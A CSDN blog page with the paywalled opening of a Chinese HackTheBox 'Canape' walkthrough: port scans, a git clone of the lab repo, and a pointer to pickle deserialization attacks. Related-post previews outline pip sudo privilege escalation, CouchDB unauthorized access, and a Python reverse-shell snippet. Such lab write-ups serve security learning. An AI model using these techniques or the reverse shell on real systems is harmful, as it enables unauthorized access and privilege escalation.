hackthebox-Canape(pickle渗透 & couchdb渗透 & pip提权)

最新推荐文章于 2023-01-30 16:11:21 发布
最新推荐文章于 2023-01-30 16:11:21 发布
阅读量366 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/113790144
版权

1、扫描

快速全局扫,再nmap根据具体扫。ssh开在了65535

masscan -p1-65535,U:1-65535 10.10.10.70 --rate=1000 -e tun0
nmap -A 10.10.10.70 -p80,65535

2、pickle渗透

根据nmap扫描结果,发现带git。加进本机的/etc/hosts

10.10.10.70 git.canape.htb canape.htb

git下载

git clone http://git.canape.htb/simpsons.git

里面有个ini.py,发现在用couchdb的数据库。另外就是使用了pickle模块
网上科普有很多。这篇文章讲了方法

https://lincolnloop.com/blog/playing-pickle-security/

最低0.47元/天 解锁文章
冬萍子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python pip提权
weixin_39219503的博客
12-21 1386
在有些linux机器,某个用户拥有pip的sudo权限,在这种情况下,可以利用pip install进行本地提权。 在执行pip install时会调用setup.py,可以在本地创建恶意setup.py文件来达到任意命令执行的效果。 from setuptools import setup from setuptools.command.install import install impor...
No.129-HackTheBox-Linux-Canape-Walkthrough渗透学习
qq_34801745的博客
06-09 564
** HackTheBox-Linux-Canape-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/134 靶机难度:级(4.7/10) 靶机发布日期:2018年9月15日 靶机描述: Canape is a moderate difficulty machine, however the use of a file (.git) that is not included in the dirbuster wordl
CouchDB 未授权访问漏洞
01-13 169
0x00 CouchDB安装 CouchDB官方网站:http://couchdb.apache.org/ 一路Next直到完成安装,打开浏览器并访问以下链接:http://127.0.0.1:5984/ 可以使用以下网址与CouchDB Web界面进行交互:http://127.0.0.1:5984/_utils 0x01 漏洞利用 1、新增query_server配置...
【甄选靶场】Vulnhub百个项目渗透——项目二十二:Wakanda_1(LFI本地文件包含,pip提权
人间体佐菲的博客
09-24 822
Vulnhub百个项目渗透——项目二十二:Wakanda_1(LFI本地文件包含,pip提权)信息安全,网络安全,渗透测试
车载技术提升系列-CANape快速入门
最新发布
02-03
车载技术提升系列——CANape快速入门
CCP-communicate-and-CANape-set.zip_Canape_标定 协议
07-14
介绍车用标定协议,CCP协议,及使用vector的工具CANape建立上位机
CANape-Quick-Start-Extended CANape操作手册
02-03
CANape_Quick_Start_Extended CANape操作手册
基于CANAPE的Panel设计(一)--button
09-10
基于CANAPE的Panel设计
CANape -数据分析
08-26
此视频介绍的是CANape关于数据分析的所有功能,对于CANape使用者分析数据有很好的指导意义,很容易上手。
HackTheBox-Oopsie
LYJ20010728的博客
07-27 551
HackTheBox-Oopsie连接配置信息搜集路径泄露网页登陆越权文件上传反弹webshell升级shell横向移动提权下一场景相关信息 连接配置 参考之前写的连接配置,文章链接 信息搜集 Kali使用Nmap进行扫描:nmap -sS -A 10.10.10.28 ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sS -A 10.10.10.28 [sudo] password for kali: Starti
【网络安全】记一次红队渗透实战项目
kali_Ma的博客
01-30 8999
mcrypt 是php里面重要的加密支持扩展库,主要是用mcrypt 扩展库各种加密函数对用户输入内容进行转换功能。就是用户输入的数据转换为base64编码和解码功能,还有将字符串转换为 8-bit 字符串功能。PHP存在四种过滤器:PHP 过滤器用于验证和过滤来自非安全来源的数据,比如用户的输入。root权限pipPIP是Python包或模块的包管理器,包含模块所需的所有文件。没发现新的东西,但是可看到devops的ID为1002是共用的!lang= ,出现这种形式,很可能是sql注入或文件包含。
hackthebox靶机记录-redpanda
weixin_44499830的博客
10-11 853
接着写一个shell,并搭建httpserver传给靶机。这么大一个搜索框,第一反应就是sql、xxe、ssti。然后发现有SSTI注入,一部分字符被过滤了,但是#和。接下来就是找远程命令执行的payload了。/etc/passwd 带出来了,执行成功。此外,因为$会被过滤,这里把他替换成*各种payload放进burp打一遍。使用的是springboot框架。还是用上面github的资源。要用java的payload。bash 执行shell文件。根据之前nmap的扫描结果。22、8080端口开放。
[HackTheBox系列] 取证分析 - Marshal in the Middle Writeup
mole_exp的博客
05-16 312
[HackTheBox系列] 取证分析 - Marshal in the Middle Writeup
靶机渗透日记
Anonymous
01-17 1227
IP为 端口 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0) 80/tcp open http Apache httpd 2.4.48 ((Debian)) 访问 80 端口是一张图片,接下来目录扫描 [23:08:42] 301 - 312B - /image -> http://192.168.1.64/image/ ..
VulnHub靶机渗透实战6-Empire Lupin One
随心所欲不逾矩
11-17 758
本次靶机涉及信息泄露漏洞,系统配置漏洞,sudo 提权ffuf 工具暴力破解目录在线识别算法https://www.dcode.fr/cipher-identifierssh2john工具的使用使用 john 破解 hashsudo:pip提权
python 反弹shell
wz200210的专栏
07-06 1588
client: nc -l 8080 server: import socket,subprocess,os  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  s.connect(("127.0.0.1",8080))  os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) 
Linux通过第三方应用提权实战总结
zhangge3663的博客
02-20 1521
Linux提权,前提是拿到了一个低权限的账号,能上传和下载文件,主要思路有: 1、内核提权。网上各种大佬的payload很多,关键在于要能找到利用哪个exp以及具体如何利用。省力点的方法是用searchsploit或者linux-exploit-suggester.sh来查找,熟悉之后难度也不大。 2、suid提权。这里也包含了sudo这种方式,两种方法的思路都是一样的,区别在于suid针对单个程序,sudo针对某个用户。这类提权方式的主要思路是:管理员授权普通用户去执行 root 权限的操作,而不需要
manual of the canape programming language casl
04-29
Canape程序语言CASL手册是一本详细介绍Canape语言的指南。Canape是一种高级编程语言,用于开发网络和分布式应用程序,它具有许多强大的功能和特性。 CASL手册提供了对Canape语言的完整说明和使用方法,包括语法、语义、模块、类型、函数和变量等方面的详细解释。手册还介绍了Canape的编译和执行过程,以及它的设计理念和使用意图。 手册的主要章节包括: 1. 起步:介绍了如何安装Canape编译器和开发环境,以及如何编写第一个Canape程序。 2. 语言基础:介绍了Canape的基本语法和语义,包括数据类型、变量、常量、运算符、控制结构等。 3. 函数和模块:介绍了Canape的函数和模块系统,以及如何编写和使用它们。 4. 面向对象编程:介绍了Canape的面向对象编程概念和语法,包括类、对象、继承、多态等。 5. 并发和分布式编程:介绍了Canape的并发和分布式编程支持,包括协程、锁、信号量、远程过程调用等。 6. 库和工具:介绍了Canape的标准库和开发工具,包括文件操作、网络编程、调试器等。 总之,Canape程序语言CASL手册是Canape编程语言的全面指南,对想要熟练掌握Canape的开发人员来说,是必不可少的参考资料。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值